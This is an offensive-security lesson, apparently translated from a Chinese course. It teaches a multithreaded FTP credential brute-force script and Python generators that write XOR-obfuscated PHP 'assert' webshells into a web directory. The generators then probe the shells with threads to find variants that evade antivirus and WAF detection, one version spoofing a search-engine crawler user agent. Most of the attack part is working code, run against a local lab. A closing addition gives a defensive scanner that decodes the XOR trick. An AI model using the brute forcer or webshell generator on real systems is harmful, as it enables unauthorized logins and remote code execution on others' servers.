Multithreaded Fuzzing & WAF XOR Evasion & Brute Forcing


  • Topics of this lesson: using protocol modules, Requests crawling, simple multithreading, encoding techniques, backdoor bypass techniques
  • Learning objective: learn to use powerful modules to implement connection operations for various protocols (brute forcing, exploitation, etc.), and combine them with fuzzing to beat WAFs

Implementing a protocol brute-force script with the FTP module

FTP server download: https://lcba.lanzouy.com/iAMePxl378h


Server log of a connection with a wrong username/password


```python
from ftplib import FTP
import sys

"""
ftp = FTP()
ftp.encoding = 'GB18030'
ftp.connect("192.168.70.145", 21)
ftp.login("admin", "test")
list = ftp.retrlines('list')
print(list)
"""

def ftp_baopo():
    ftp = FTP()
    ftp.connect("192.168.70.145", 21)
    for username in open('user.txt'):
        for password in open('password.txt'):
            username = username.replace('\n', '')
            password = password.replace('\n', '')
            # print(username + '|' + password)
            ftp.login(username, password)  # raises on a wrong password; this first version has no try/except
            list = ftp.retrlines('list')   # directory listing once a login succeeds
            print(list)

if __name__ == '__main__':
    """
    ip = sys.argv[1]
    port = sys.argv[2]
    user = sys.argv[3]
    pass = sys.argv[4]
    """
    ftp_baopo()
```

After running it, an error is reported.


This is not a problem with the code: the username/password is wrong, and this is the error the FTP server returns.


On the server side you can see that the failed attempt is still logged. At this point a try/except is needed to skip the error and keep going.


Run it and check the log on the FTP server.


There are many failed attempts, and the successful login is at the bottom. Brute forcing at this speed is slow, so multithreading is used.

Multithreading

```python
import ftplib
from ftplib import FTP
import sys
import threading
import queue

def ftp_brute(ip, port):
    ftp = ftplib.FTP()
    ftp.connect(ip, port)
    while not q.empty():  # empty() is True when the queue is drained; 'not' inverts it
        try:
            entry = q.get_nowait()  # non-blocking: another thread may have taken the last item
        except queue.Empty:
            break
        entry = entry.split('|')  # '|' is used as the separator
        username = entry[0]       # index 0 is the username
        password = entry[1]       # index 1 is the password
        try:
            ftp.login(username, password)
            print(username + '|' + password + '| ok')
            list = ftp.retrlines('list')  # at this point the listing of the current FTP directory is available
            print(list)
        except ftplib.all_errors:
            print(username + '|' + password + '| no')
            pass

if __name__ == '__main__':
    ip = sys.argv[1]
    port = int(sys.argv[2])
    userfile = sys.argv[3]
    passfile = sys.argv[4]
    threading_num = int(sys.argv[5])
    q = queue.Queue()  # standard way to create a queue
    for username in open(userfile):
        for password in open(passfile):
            username = username.replace('\n', '')
            password = password.replace('\n', '')
            # print(username+'|'+password)
            q.put(username + '|' + password)  # put adds an item, get takes one out

    for x in range(threading_num):
        t = threading.Thread(target=ftp_brute, args=(ip, port))
        t.start()

"""
First set up a few input parameters: IP, port, username dictionary, password dictionary and thread count.
A loop joins each username and password with a separator, and a queue then passes the pairs into the function.
"""
```

Combining fuzzing to build an AV-evading XOR shell script

  1. Explanation of the XOR shell evasion principle and the development approach (reference and examples: !^@, ”^? etc.)
  2. Generating a large number of payloads with a fuzzing approach, naming them in order and writing them into the website directory
  3. Using multithreading to batch-access the shell files and submit a test to check whether they connect and echo back normally
```python
import time
import requests
import threading, queue

def bypass_check():
    while not q.empty():
        try:
            filename = q.get_nowait()  # non-blocking: another thread may have taken the last item
        except queue.Empty:
            break
        url = "http://127.0.0.1:8081/x/" + filename
        datas = {
            'x': 'phpinfo();'  # the key must be exactly 'x' to match $_POST[x] in the generated file
        }
        result = requests.post(url, data=datas).content.decode('utf-8')
        if "XIAODI-PC" in result:  # hostname shown by phpinfo() on the test machine
            print('check ->' + filename + '->ok')
        else:
            print('check ->' + filename + '->no')
        time.sleep(1)

if __name__ == '__main__':
    q = queue.Queue()
    for i in range(1, 127):
        for ii in range(1, 127):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            with open('D:/phpstudy/WWW/x/' + filename, 'a+') as f:
                f.write(code)
    print("Fuzz文件生成成功")
    for x in range(20):
        t = threading.Thread(target=bypass_check)
        t.start()
```

Another way to write it:

```python
import requests

index = 0  # counter
for i in range(0, 128):
    for ii in range(0, 128):
        if i ^ ii == 97:  # only keep pairs whose XOR equals 'a' (97); Xiaodi's video does not have this step
            index += 1
            code = "<?php $a=" + '(' + "'" + chr(i) + "'" + '^' + "'" + chr(ii) + "'" + ')' + '.' + "'ssert'" + ';$a($_POST[x]);?>'  # generate the backdoor code
            name = str(i) + 'xd' + str(ii) + '.php'  # backdoor file name
            name = 'F:/phpstudy/phpStudy_64/phpstudy_pro/WWW/x/' + name  # save path
            with open(name, 'a+', encoding='utf-8') as f:  # the with block closes the file itself
                f.write(code)
            print('生成了' + str(index) + "个文件")
            # to send the request as well
            header = {
                'User-Agent': 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'}
            data = {'x': 'phpinfo();'}
            try:
                url = 'http://127.0.0.1/x/' + str(i) + 'xd' + str(ii) + '.php'
                result = requests.post(url=url, data=data, headers=header, timeout=0.5).content.decode('utf-8')
                if 'System' in result:
                    print(name + ' is ok')
            except Exception as e:
                pass
```

But this approach can no longer evade detection.
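As an added, defender-side example (not code from the original post): a small static check that finds the ('X'^'Y').'suffix' construct the generators above write, evaluates the XOR the way PHP does, and reports which function name the file actually calls, so a scanner can see that ('!'^'@').'ssert' resolves to assert. The DANGEROUS list and the sample file contents are assumptions made for this example.

```python
import re

# Callables a reconstructed name is checked against (assumed list for this example)
DANGEROUS = {"assert", "eval", "system", "exec", "passthru", "shell_exec", "popen", "proc_open"}

# A PHP single-quoted string: 'a', '\'' (escaped quote) or '\\' (escaped backslash)
_STR = r"'((?:\\.|[^'\\])*)'"
# The construct  ( 'X' ^ 'Y' ) . 'suffix'  with optional whitespace between tokens
XOR_CONCAT = re.compile(r"\(\s*" + _STR + r"\s*\^\s*" + _STR + r"\s*\)\s*\.\s*" + _STR)

def php_unescape(s):
    """Undo the only two escapes PHP honours inside single-quoted strings."""
    return s.replace("\\'", "'").replace("\\\\", "\\")

def xor_strings(a, b):
    """PHP's string ^ string: byte-wise XOR, result as long as the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))

def find_xor_callables(php_source):
    """Return [(reconstructed_name, matched_text)] for every XOR-built name in the source."""
    hits = []
    for m in XOR_CONCAT.finditer(php_source):
        left, right, suffix = (php_unescape(g) for g in m.groups())
        hits.append((xor_strings(left, right) + suffix, m.group(0)))
    return hits

def scan(php_source):
    """Only the reconstructed names that resolve to a dangerous callable."""
    return [name for name, _ in find_xor_callables(php_source) if name.lower() in DANGEROUS]

# Constructed sample in the shape the generators above produce: '!' ^ '@' == 'a'
SAMPLE = "<?php $a=('!'^'@').'ssert';$a($_POST[x]);?>"

if __name__ == "__main__":
    for name, text in find_xor_callables(SAMPLE):
        verdict = "DANGEROUS" if name.lower() in DANGEROUS else "benign"
        print(f"{text!r} -> {name!r} ({verdict})")
```

Because the check evaluates the expression instead of matching the literal word "assert", it is unaffected by which character pair the fuzzer picked.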
